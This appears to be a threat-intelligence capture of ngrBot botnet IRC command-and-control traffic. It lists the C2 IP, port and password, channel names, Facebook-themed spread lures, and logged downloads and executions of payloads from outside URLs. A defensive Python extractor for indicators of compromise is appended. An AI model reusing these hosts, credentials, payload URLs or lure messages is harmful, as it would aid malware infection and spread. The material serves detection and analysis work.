matea.dukatlgg.com (botnet hosted in United States, Staminus Communications)

* Dns resolving haso.dukatlgg.com

* Dns resolved haso.dukatlgg.com to 72.20.30.119

* Dns resolving matea.dukatlgg.com

* Dns resolved matea.dukatlgg.com to 72.20.30.119

* Dns resolved haso.dukatlgg.com to 67.159.63.63

Remote Host      Port Number   Notes
213.251.170.52   80
70.38.98.234     80
70.38.98.237     80
70.38.98.238     80
72.20.30.119     8888          PASS ngrBot (IRC server password sent by the bot)

PRIVMSG #msn :[MSN]: Updated MSN spread message to “hahah.. your photo? http://apps.facebook.com/yourphooto/photo.php?=53821324”
PRIVMSG #TeST-RouNd_03# :[d=”http://img104.herosh.com/2011/04/13/183566678.gif” s=”80384 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\1.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: “C:\Documents and Settings\UserName\Application Data\1.tmp”
PRIVMSG #r :[Ruskill]: Detected DNS: “google.at”
PRIVMSG #r :[Ruskill]: Detected DNS: “narod.ru”
PRIVMSG #TeST-RouNd_03# :[d=”http://img101.herosh.com/2011/04/13/172990124.gif” s=”67584 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\2.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: “C:\WINDOWS\system32\drwtsn32.exe”
QUIT :rebooting
NICK n{US|XPa}xgaszol
USER xgaszol 0 0 :xgaszol
JOIN #TeST-RouNd_03# ngrBot
JOIN #new
JOIN #msn
PRIVMSG #msn :[MSN]: Updated MSN spread interval to “1”

72.20.30.119 3333 PASS ngrBot

NICK n{US|XPa}pniwxfx
USER pniwxfx 0 0 :pniwxfx
NICK n{US|XPa}mdqgmbq
USER mdqgmbq 0 0 :mdqgmbq

UPDATE:
JOIN #update
PRIVMSG #spread :[MSN]: Updated MSN spread interval to “7”
PRIVMSG #spread :[MSN]: Updated MSN spread message to “hahah! http://apps.facebook.com/yourphooto/photo.php?=fb-pic313.jpg”
PRIVMSG #spread :[HTTP]: Updated HTTP spread interval to “3”
PRIVMSG #spread :[HTTP]: Updated HTTP spread message to “hahah! http://apps.facebook.com/yourphooto/photo.php?=fb-pic313.jpg”
PRIVMSG #update :[d=”http://coremediaarea.in/install.52161.exe” s=”79360 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\1.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: “C:\Documents and Settings\UserName\Application Data\1.tmp”
PRIVMSG #r :[Ruskill]: Detected DNS: “repubblica.it”
PRIVMSG #update :[d=”http://img103.herosh.com/2011/04/22/185746627.gif” s=”69632 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\2.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected DNS: “seesaa.net”
PRIVMSG #r :[Ruskill]: Detected DNS: “yelp.com”
PRIVMSG #update :[d=”http://picture8.fileave.com/facebook-pic0444320279.jpg.exe” s=”200704 bytes”] Update error: MD5 mismatch (6EFCA88171EC593C64E842100F186811 != 18BEAD45E13BC1AA2BDAD562C682B413)
NICK n{US|XPa}evywles
USER evywles 0 0 :evywles
JOIN #DarkSons# ngrBot
JOIN #new
JOIN #spread
JOIN
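Both sessions above carry the same ngrBot status-message shapes: a PASS line with the server password, NICK/USER with a country|OS tag, JOIN with the channel key, and PRIVMSG lines reporting downloads (d="url" s="N bytes"), dropped file paths, MD5 mismatches, spread messages and Ruskill File/DNS detections. The following Python is an added example, not part of the original capture or of the bot itself, that pulls indicators of compromise out of such traffic and flags a session as ngrBot-like. The sample lines are constructed to mirror the capture, and the regexes, field names and the `looks_like_ngrbot` heuristic are my own assumptions about these formats.

```python
"""IOC extractor for ngrBot-style IRC C2 status traffic (added example).

Assumptions (not from the capture itself): the regexes below describe the
message shapes seen in the two sessions; curly and straight quotes are
treated alike because pasted captures often carry curly quotes.
"""
import re
from collections import defaultdict

# Constructed sample in the same shape as the capture above.
SAMPLE_LOG = r'''
72.20.30.119 8888 PASS ngrBot
NICK n{US|XPa}xgaszol
USER xgaszol 0 0 :xgaszol
JOIN #TeST-RouNd_03# ngrBot
JOIN #msn
PRIVMSG #msn :[MSN]: Updated MSN spread message to "hahah.. your photo? http://apps.facebook.com/yourphooto/photo.php?=53821324"
PRIVMSG #TeST-RouNd_03# :[d="http://img104.herosh.com/2011/04/13/183566678.gif" s="80384 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: "C:\WINDOWS\system32\drwtsn32.exe"
PRIVMSG #r :[Ruskill]: Detected DNS: “google.at”
PRIVMSG #update :[d="http://picture8.fileave.com/facebook-pic0444320279.jpg.exe" s="200704 bytes"] Update error: MD5 mismatch (6EFCA88171EC593C64E842100F186811 != 18BEAD45E13BC1AA2BDAD562C682B413)
QUIT :rebooting
'''

Q = '["\u201c\u201d]'        # one straight or curly double quote
NQ = '[^"\u201c\u201d]+'     # run of anything except a double quote

RE_PASS = re.compile(r'^(\S+) (\d+) PASS (\S+)$')          # host port PASS secret
RE_NICK = re.compile(r'^NICK (n\{([^}]*)\}\w+)$')           # n{CC|OS}random
RE_JOIN = re.compile(r'^JOIN (#\S+)(?: (\S+))?$')            # channel [key]
RE_DOWNLOAD = re.compile(r'\[d=' + Q + '(?P<url>' + NQ + ')' + Q +
                         ' s=' + Q + r'(?P<size>\d+) bytes' + Q + r'\]')
RE_EXEC = re.compile('Executed file ' + Q + '(?P<path>' + NQ + ')' + Q)
RE_MD5 = re.compile(r'MD5 mismatch \((?P<a>[0-9A-Fa-f]{32}) != (?P<b>[0-9A-Fa-f]{32})\)')
RE_SPREAD = re.compile(r'\[(?P<vector>MSN|HTTP)\]: Updated (?:MSN|HTTP) spread message to '
                       + Q + '(?P<msg>' + NQ + ')' + Q)
RE_RUSKILL = re.compile(r'\[Ruskill\]: Detected (?P<kind>File|DNS): '
                        + Q + '(?P<value>' + NQ + ')' + Q)
RE_URL = re.compile(r'https?://\S+')


def extract_iocs(log_text):
    """Return a dict of sorted IOC lists keyed by type (hypothetical key names)."""
    iocs = defaultdict(set)
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = RE_PASS.match(line)
        if m:
            iocs["c2"].add(f"{m.group(1)}:{m.group(2)}")
            iocs["irc_password"].add(m.group(3))
            continue
        m = RE_NICK.match(line)
        if m:
            iocs["nick_tag"].add(m.group(2))      # e.g. "US|XPa"
            continue
        m = RE_JOIN.match(line)
        if m:
            iocs["channel"].add(m.group(1))
            if m.group(2):
                iocs["channel_key"].add(m.group(2))
            continue
        # The PRIVMSG status lines can carry several indicators at once.
        m = RE_DOWNLOAD.search(line)
        if m:
            iocs["download_url"].add(m.group("url"))
        m = RE_EXEC.search(line)
        if m:
            iocs["dropped_path"].add(m.group("path"))
        m = RE_MD5.search(line)
        if m:
            iocs["md5"].update(m.group("a", "b"))   # both hashes are worth pivoting on
        m = RE_SPREAD.search(line)
        if m:
            iocs["spread_url"].update(RE_URL.findall(m.group("msg")))
        m = RE_RUSKILL.search(line)
        if m:
            key = "ruskill_file" if m.group("kind") == "File" else "ruskill_dns"
            iocs[key].add(m.group("value"))
    return {k: sorted(v) for k, v in iocs.items()}


def looks_like_ngrbot(iocs):
    """Heuristic (my assumption): the literal 'ngrBot' password/channel key
    together with an n{CC|OS} nick tag marks the session as ngrBot-like."""
    keyed = ("ngrBot" in iocs.get("irc_password", [])
             or "ngrBot" in iocs.get("channel_key", []))
    tagged = any(re.fullmatch(r"[A-Z]{2}\|\w+", t) for t in iocs.get("nick_tag", []))
    return keyed and tagged


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_LOG)
    for key, values in found.items():
        print(key, values)
    print("ngrBot-like:", looks_like_ngrbot(found))
```

Run it over a full IRC capture (one message per line) to get a pivot list of download hosts, dropped paths and MD5s; the Ruskill DNS names are the domains the downloaded payloads themselves contacted, so they belong in a separate watch list from the C2 host.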

Info about hosting:
http://whois.domaintools.com/72.20.30.119
